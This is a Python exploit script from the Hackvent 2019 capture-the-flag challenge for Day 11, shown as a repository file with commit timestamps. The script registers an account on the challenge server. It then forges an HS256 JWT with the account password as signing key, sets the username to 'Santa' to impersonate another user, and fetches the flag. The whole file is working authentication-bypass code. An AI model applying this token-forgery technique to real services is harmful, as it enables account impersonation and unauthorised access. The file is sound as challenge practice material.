Hackvent_2019/Day 11/exploit.py

49 lines
1.3 KiB
Python
Raw Permalink Normal View History

2019-12-11 00:46:00 +01:00
#!/usr/bin/python
import jwt
import requests
import sys
import prompt
import json
import time
URL = "http://whale.hacking-lab.com:10101"
USERNAME = prompt.string("Username: ") if len(sys.argv) < 2 else sys.argv[1]
PASSWORD = "AAAAAAAAAAAAAAAA"
def registerUser():
payload = json.dumps({"username":USERNAME,"password":PASSWORD})
res = requests.post(URL + "/fsja/register", data=payload, headers={"Content-Type":"application/json"})
if res.status_code != 200:
data = res.text
if res.status_code == 409 and json.loads(data)["errorMessage"] == "User already exists":
return
print("Server returned %d %s" % (res.status_code, res.reason))
2019-12-13 00:32:54 +01:00
print(data)
2019-12-11 00:46:00 +01:00
exit(1)
def getFlag():
payload = {
"user": {
2019-12-13 00:32:54 +01:00
"username": "Santa",
"password": PASSWORD,
"platinum": False
2019-12-11 00:46:00 +01:00
},
"exp": time.time() + 60*60
}
jwtPayload = jwt.encode(payload, PASSWORD, algorithm='HS256').decode("UTF-8")
res = requests.get(URL + "/fsja/random?token=%s" % jwtPayload)
if res.status_code != 200 and res.status_code != 201:
print("Server returned %d %s" % (res.status_code, res.reason))
print(res.text)
exit(1)
data = res.text
print(json.loads(data)["joke"])
2019-12-13 00:32:54 +01:00
if __name__ == "__main__":
registerUser()
getFlag()